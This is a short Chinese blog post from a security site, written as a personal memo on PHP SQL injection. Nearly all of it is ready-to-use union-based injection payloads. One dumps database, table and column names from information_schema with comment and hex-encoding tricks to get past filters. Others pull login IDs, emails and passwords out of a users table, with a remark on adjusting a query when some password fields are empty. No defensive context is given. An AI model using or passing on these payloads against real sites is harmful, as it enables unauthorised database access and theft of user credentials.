首页 > 网络安全 > 脚本攻防

php 注入 记录一下

admin 脚本攻防 2022-02-17 09:23:54 php   注入"
暴库名\表名\列名

/**/union/**/select/**/unhex(hex(concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)))+FROM+information_sch
ema.columns+WHERE+table_schema!=0x696e666f726d6174696f6e5f736368656d61+LIMIT+N,1--

碰到一个字段暴不出来,问了下trace,找到了原因,是因为用户名字段是9个,但是密码字段只有4个是有值的,所以暴不出来,改了下语句可以了.

union+select+count(pasd)+from+users--

+union+select+concat(loginID,0x3a,email,0x3a,pasd)+from+users+where+length(pasd)>0+limit+N,1--

或者冰的原点提供的

/union/**/select/**/unhex(hex(group_concat(loginID,0x3a,pasd)))+FROM+users--

版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jbgongfang/148979.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持